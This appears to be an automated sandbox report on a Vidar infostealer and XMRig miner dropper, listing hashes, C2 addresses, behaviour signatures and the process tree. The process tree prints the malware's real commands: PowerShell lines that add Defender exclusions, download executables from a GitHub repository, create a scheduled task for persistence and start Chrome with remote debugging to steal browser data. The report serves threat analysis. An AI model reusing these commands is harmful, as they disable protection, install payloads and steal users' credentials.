Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/03/2025, 14:24
Static task
static1
Behavioral task
behavioral1
Sample
PokyBilsTGS.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral2
Sample
PokyBilsTGS.exe
Resource
win11-20250313-en
General
-
Target
PokyBilsTGS.exe
-
Size
322KB
-
MD5
1b044fbca4a8963fb4ab17ab5ae7c2ef
-
SHA1
c234cc9b4dcb92fdd21ec71bae98745eaf43b7bd
-
SHA256
7c4aa4a2ab6b2a032881e90f13ddd38b675b0d3db391bfd1a60d55927a483587
-
SHA512
cf31978386764bb0fd8c12c32e3c354ead48dacbcffe035e07f2a40ba09a418033e47ecb1e79dfbe6dafe03676cb834f2281a8456b82e8e4a13b9ddfac9d6d00
-
SSDEEP
6144:GmQCJp3wv+eLkfCOuHejhurki9H/WUgCNxwsD7Gm:vHa+ekfxjhurv9eMksD6m
Malware Config
Extracted
vidar
13.3
886e3178ef0cef21a6ff7125395660f2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral2/files/0x001b00000002b1ae-50.dat family_vidar_v7 -
Vidar family
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/5216-633-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-663-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-666-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-665-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-664-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-662-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-634-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-826-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/5216-827-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Blocklisted process makes network request 6 IoCs
flow pid Process 2 3324 powershell.exe 3 5116 powershell.exe 4 3360 powershell.exe 5 5116 powershell.exe 6 3324 powershell.exe 7 3360 powershell.exe -
pid Process 3324 powershell.exe 3360 powershell.exe 5116 powershell.exe 5636 powershell.exe 5924 powershell.exe 3532 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts llttzcccf.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5968 chrome.exe 2880 chrome.exe 1540 chrome.exe 3748 chrome.exe 2344 msedge.exe 1104 msedge.exe 4620 msedge.exe 5808 chrome.exe -
Executes dropped EXE 5 IoCs
pid Process 4492 pydvp.exe 4340 gganxacc.exe 2864 llttzcccf.exe 1604 service.exe 4936 Updater.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com 17 pastebin.com 1 raw.githubusercontent.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3892 powercfg.exe 4412 powercfg.exe 4260 powercfg.exe 5148 powercfg.exe 2020 powercfg.exe 2772 powercfg.exe 4976 powercfg.exe 6068 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe llttzcccf.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4936 set thread context of 5288 4936 Updater.exe 180 PID 4936 set thread context of 5216 4936 Updater.exe 182 -
resource yara_rule behavioral2/memory/5216-613-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-633-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-663-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-666-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-665-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-664-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-662-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-634-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-632-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-620-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-631-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-630-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-826-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/5216-827-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1612 sc.exe 3764 sc.exe 4412 sc.exe 2264 sc.exe 1012 sc.exe 4240 sc.exe 5848 sc.exe 3236 sc.exe 5056 sc.exe 5540 sc.exe 5916 sc.exe 2348 sc.exe 4660 sc.exe 1044 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pydvp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gganxacc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gganxacc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 gganxacc.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1436 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876455636098479" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2160 schtasks.exe 1020 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5636 powershell.exe 5636 powershell.exe 3324 powershell.exe 5116 powershell.exe 3360 powershell.exe 3360 powershell.exe 5116 powershell.exe 3324 powershell.exe 4340 gganxacc.exe 4340 gganxacc.exe 4340 gganxacc.exe 4340 gganxacc.exe 5808 chrome.exe 5808 chrome.exe 4340 gganxacc.exe 4340 gganxacc.exe 2864 llttzcccf.exe 5924 powershell.exe 5924 powershell.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 2864 llttzcccf.exe 4936 Updater.exe 3532 powershell.exe 3532 powershell.exe 4340 gganxacc.exe 4340 gganxacc.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4936 Updater.exe 4340 gganxacc.exe 4340 gganxacc.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 5216 explorer.exe 4340 gganxacc.exe 4340 gganxacc.exe 5216 explorer.exe 5216 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 2344 msedge.exe 2344 msedge.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 5636 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 3360 powershell.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeShutdownPrivilege 5808 chrome.exe Token: SeCreatePagefilePrivilege 5808 chrome.exe Token: SeDebugPrivilege 5924 powershell.exe Token: SeShutdownPrivilege 2772 powercfg.exe Token: SeCreatePagefilePrivilege 2772 powercfg.exe Token: SeShutdownPrivilege 2020 powercfg.exe Token: SeCreatePagefilePrivilege 2020 powercfg.exe Token: SeShutdownPrivilege 5148 powercfg.exe Token: SeCreatePagefilePrivilege 5148 powercfg.exe Token: SeShutdownPrivilege 4260 powercfg.exe Token: SeCreatePagefilePrivilege 4260 powercfg.exe Token: SeDebugPrivilege 3532 powershell.exe Token: SeShutdownPrivilege 6068 powercfg.exe Token: SeCreatePagefilePrivilege 6068 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeLockMemoryPrivilege 5216 explorer.exe Token: SeShutdownPrivilege 3892 powercfg.exe Token: SeCreatePagefilePrivilege 3892 powercfg.exe Token: SeShutdownPrivilege 4412 powercfg.exe Token: SeCreatePagefilePrivilege 4412 powercfg.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 5808 chrome.exe 2344 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1116 wrote to memory of 3860 1116 PokyBilsTGS.exe 84 PID 1116 wrote to memory of 3860 1116 PokyBilsTGS.exe 84 PID 3860 wrote to memory of 5636 3860 cmd.exe 85 PID 3860 wrote to memory of 5636 3860 cmd.exe 85 PID 1116 wrote to memory of 4920 1116 PokyBilsTGS.exe 86 PID 1116 wrote to memory of 4920 1116 PokyBilsTGS.exe 86 PID 1116 wrote to memory of 4928 1116 PokyBilsTGS.exe 88 PID 1116 wrote to memory of 4928 1116 PokyBilsTGS.exe 88 PID 1116 wrote to memory of 4708 1116 PokyBilsTGS.exe 87 PID 1116 wrote to memory of 4708 1116 PokyBilsTGS.exe 87 PID 4708 wrote to memory of 5116 4708 cmd.exe 89 PID 4708 wrote to memory of 5116 4708 cmd.exe 89 PID 4928 wrote to memory of 3360 4928 cmd.exe 90 PID 4928 wrote to memory of 3360 4928 cmd.exe 90 PID 4920 wrote to memory of 3324 4920 cmd.exe 91 PID 4920 wrote to memory of 3324 4920 cmd.exe 91 PID 1116 wrote to memory of 4492 1116 PokyBilsTGS.exe 92 PID 1116 wrote to memory of 4492 1116 PokyBilsTGS.exe 92 PID 1116 wrote to memory of 4492 1116 PokyBilsTGS.exe 92 PID 1116 wrote to memory of 4340 1116 PokyBilsTGS.exe 93 PID 1116 wrote to memory of 4340 1116 PokyBilsTGS.exe 93 PID 1116 wrote to memory of 4340 1116 PokyBilsTGS.exe 93 PID 4492 wrote to memory of 4300 4492 pydvp.exe 94 PID 4492 wrote to memory of 4300 4492 pydvp.exe 94 PID 4492 wrote to memory of 4300 4492 pydvp.exe 94 PID 4300 wrote to memory of 2160 4300 cmd.exe 96 PID 4300 wrote to memory of 2160 4300 cmd.exe 96 PID 4300 wrote to memory of 2160 4300 cmd.exe 96 PID 1116 wrote to memory of 2864 1116 PokyBilsTGS.exe 97 PID 1116 wrote to memory of 2864 1116 PokyBilsTGS.exe 97 PID 4340 wrote to memory of 5808 4340 gganxacc.exe 98 PID 4340 wrote to memory of 5808 4340 gganxacc.exe 98 PID 5808 wrote to memory of 236 5808 chrome.exe 99 PID 5808 wrote to memory of 236 5808 chrome.exe 99 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100 PID 5808 wrote to memory of 1352 5808 chrome.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"2⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
-
C:\Users\Admin\AppData\Local\wzioof\pydvp.exe"C:\Users\Admin\AppData\Local\wzioof\pydvp.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2160
-
-
-
-
C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe"C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5808 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbbd22dcf8,0x7ffbbd22dd04,0x7ffbbd22dd104⤵PID:236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1876,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1708 /prefetch:24⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2228 /prefetch:114⤵PID:5760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2756 /prefetch:134⤵PID:5908
-
-
